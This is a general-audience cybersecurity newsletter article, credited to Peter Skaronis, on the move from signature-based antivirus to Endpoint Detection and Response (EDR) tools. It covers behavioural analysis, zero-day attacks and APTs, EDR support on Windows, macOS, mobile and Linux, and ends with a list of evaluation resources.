“There is nothing permanent except change” wrote Greek Philosopher Heraclitus. Often put forward, this relatively hackneyed idea according to which we live in a constantly evolving universe is particularly relevant at a time when our environments – and predominantly the cybersecurity ecosystems – are in the grip of profound transformations and ceaseless upheavals. Amplifying growth in cyberthreats, more and more regular use of generative AI and deepfakes to penetrate within organizations are putting corporate security teams under significant pressure.
“There is nothing permanent except change”
The Changing Landscape of Computing
In the ever-evolving realm of cybersecurity, the growing need for robust controls remains more than ever persistent. As a matter of fact, endpoint protection is a prime example. For years, endpoint protection has been a fundamental control safeguarding desktops, laptops, and servers within company firewalls and internal networks, or behind a VPN for remote workers.
Nevertheless, in the last ten (10) years, we have witnessed two major shifts in terms of computing: cloud computing technology and remote working.
Nowadays, a lot of small companies operate without a corporate office or computer network, instead leveraging cloud-hosted solutions offered by Microsoft and Google, and utilizing a mix of company-owned and personal devices.
With the blurring of computer network ownership and responsibility lines, coupled with multiple layers of vendors and widespread administrative access on endpoints, the importance of endpoint security has never been greater.
As cyberthreats evolve, traditional antivirus software is no longer adequate for protecting modern devices. This has led to the development of Endpoint Detection and Response (EDR) solutions. This month Newsletter explores the shift from antivirus software to EDR, their functionality, dependence on operating systems, and the needs they fulfill in various environments.
This transition marks a significant shift in our approach to protecting digital assets, reflecting the changing nature of cyberthreats and the evolving requirements of new workplace environments.
What Is an Antivirus Software?
Antivirus software, a traditional security solution, primarily detects and removes viruses. An antivirus software is precisely a program designed to prevent, scan, detect, and remove viruses and other malicious software from a computer. It compares files to a database of known malware signatures, quarantining or deleting infected files as needed. While these systems are effective against basic malware, they struggle against more sophisticated threats such as 0-day attacks. A 0-day is a vulnerability within a computer system unknown to its owners, developers, or anyone capable of mitigating it. Until the vulnerability is remedied, threat perpetrators can exploit it in a zero-day attack.
Some antivirus solutions include firewall capabilities, which monitor and control incoming and outgoing network traffic based on predetermined rules. While essential for defending against computer network-based attacks, firewalls cannot always defend a network against more complex threats such as fileless malware or more advanced persistent threats.
From Antivirus to EDR Solutions: Behavioural Analysis and Machine Learning
EDR solutions go beyond traditional antivirus software by focusing on behavioural analysis and machine learning. Rather than relying solely on virus signatures, EDR solutions analyze the behaviour of processes and applications running on a device or computer network. By monitoring behaviours such as system calls, registry changes, and network connections, EDR solutions can identify suspicious activities that may indicate malicious intent. This approach is particularly effective against zero-day attacks, which exploit previously unknown vulnerabilities.
Fundamentally, EDR also leverages machine learning algorithms to analyze vast amounts of data generated by devices and networks to detect anomalies and potential threats. By continuously analyzing and learning from this data, EDR software can adapt to new threat configurations and patterns, and provide real-time protection against emerging malware strains.
This approach is particularly useful in detecting Advanced Persistent Threats (APTs), which are highly sophisticated malware designed to evade detection by traditional antivirus software. An Advanced Persistent Threat (APT) is a stealthy threat actor, typically a state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. In recent times, the term Advanced Persistent Threat (APT) may also refer to non-state-sponsored groups conducting large-scale targeted intrusions for specific political or economic goals.
EDR solutions are designed to protect endpoints but they cannot provide complete security coverage for all the digital assets within your organization. EDR should operate as one aspect of your overall information security strategy, alongside other tools such as antivirus, patch management, firewalls, encryption, and DNS protection. By combining EDR with other cybersecurity measures, you can create a layered defence that can detect and respond to a wide range of cyberthreats.
What is Endpoint Detection and Response (EDR)?
Endpoint Detection and Response (EDR) is not designed to detect all desktops, laptops and smart phones in your network but rather to proactively detect cyberthreats on endpoints when they accrue and respond to them in real time.
The evolution of cybersecurity and EDR has been driven by the increasing sophistication and prevalence of cyberthreats. As the Internet and computer networks have become an integral part of our daily life, the risk of cyber-attacks has also grown. Cybersecurity measures and technologies have had to evolve in order to keep up with these cyberthreats and protect individuals, businesses, organizations and governments from harm.
EDR uses a combination of machine learning, artificial intelligence, and other surveillance technologies to monitor network traffic and identify potential cyberthreats in real time. If a cyberthreat is detected, EDR can take a variety of actions – including blocking the cyberthreat, quarantining the device, or alerting cybersecurity personnel.
Moreover, the evolution of cybersecurity and EDR has been driven by the need to keep abreast of the ever-evolving landscape of cyberthreats and cyber-attacks. As computer technology continues to advance, so too will the technologies used to protect against cyberthreats and cyber-attacks. Therefore, it is paramount that individuals, businesses, organizations and governments stay up-to-date on the latest cybersecurity technologies and best practices in order to stay safe and secure in the digital age.
Dependency on Operating Systems
EDR is available for various operating systems, including Windows, macOS, iOS, Android, and Linux. While traditional antivirus software is more prevalent in the Windows environment due to its market share, EDR solutions are becoming increasingly popular across all major operating systems.
In the macOS environment, for example, Apple’s built-in XProtect system provides basic malware protection against known threats. However, to address the growing threat landscape facing macOS devices, many organizations are turning to specialized EDR solutions designed specifically for macOS. These solutions offer advanced features such as real-time behavioural analysis and machine learning-based malware detection.
Similarly, in the mobile devices’ environment, while iOS and Android have built-in antivirus capabilities, they do not provide comprehensive protection against sophisticated threats. Organizations operating in these environments need specialized EDR solutions that offer advanced features such as network traffic monitoring, device encryption, and Data Loss Prevention (DLP).
Microsoft’s default Defender product is a popular EDR solution for Windows devices. It provides advanced protection against malware, including behavioural analysis, machine learning-based threat detection, and real-time response capabilities. Microsoft Defender also integrates with other Microsoft products such as Azure Sentinel and Advanced Threat Protection (ATP) to provide a comprehensive security posture across an organization’s entire ecosystem.
Finally, while Linux is generally considered more secure than other operating systems due to its open-source nature, it is not immune to cyberthreats. To address this, specialized EDR solutions like ESET Cyber Security for Linux provide advanced protection capabilities such as real-time malware detection and behavioural analysis in a lightweight package optimized for Linux environments.
Conclusion
To sum up, while traditional antivirus software remains vital for detecting basic malware, it falls short against advanced cyberthreats.
As cybersecurity challenges grow, adopting comprehensive solutions like EDR is crucial for protecting modern digital ecosystems. Sometimes there is a need to combine both an antivirus and the EDR system.
Understanding the functionalities and system dependencies of antivirus and EDR solutions allows organizations to make well-informed cybersecurity choices.
References for Evaluating Antivirus and EDR Solutions
- PCMag: Annual Benchmark: The Best Antivirus Software for 2024 provides insights into antivirus software performance, assessing factors like detection rates and user interface. (link)
- PCMag: The Best Hosted Endpoint Protection and Security Software for 2023 (link)
- PCMag: The Best Free Antivirus Software for 2024 (link)
- Gartner Peer Insights: Reviews user experiences with various EDR solutions, helping organizations decide on the best fit for their needs (link)
- TechRepublic: EDR Software: Choosing the Best Solutions for Your Business (link)
- Canadian Centre for Cybersecurity: End User Device Security for Bring-Your-Own-Device (BYOD) Deployment Models – ITSM.70.003 (link)
- Centre for Cybersecurity Belgium: Recommendations for antivirus, EDR and XDR security solutions (link)
Contributions
Special thanks to the National Research Council of Canada for their financial support
Author : Peter Skaronis
Executive Editor : Alan Bernardi
Reviser, Proofreader & Translator : Ravi Jay Gunnoo